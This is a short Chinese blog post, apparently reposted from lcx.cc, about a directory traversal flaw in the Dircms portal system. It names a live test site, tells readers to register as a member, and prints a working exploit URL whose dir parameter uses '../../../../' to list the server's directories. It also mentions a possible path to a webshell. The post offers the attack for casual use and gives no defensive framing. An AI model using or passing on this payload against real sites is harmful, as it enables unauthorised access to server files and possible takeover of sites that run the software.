今天在A5找到 dircms,商业版那个叫贵吖,又不安全,不知道是不是就一个程序员,一个客服的小公司。
挖到一个遍历目录
貌似还有地方可以拿shell晚上回家测试
刚刚百度,乌云貌似是12号有提交
不过还没有公开所以不算抄袭。
地址:http://www.wooyun.org/bugs/wooyun-2010-09537
测试网站:http://www.tengzhou0632.com
先注册会员
然后打开EXP:http://madman.in/api/upload/index.php?action=list_image&objid=image_api_image&dir=9d4c2f636f067f89../../../../
然后目录就全部爆出来了,喜欢的自己下载源码去研究。有免费版的。
下载地址:http://down.chinaz.com/soft/27402.htm
留言评论(旧系统):
文章来源于lcx.cc:Dircms门户系统遍历目录漏洞
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论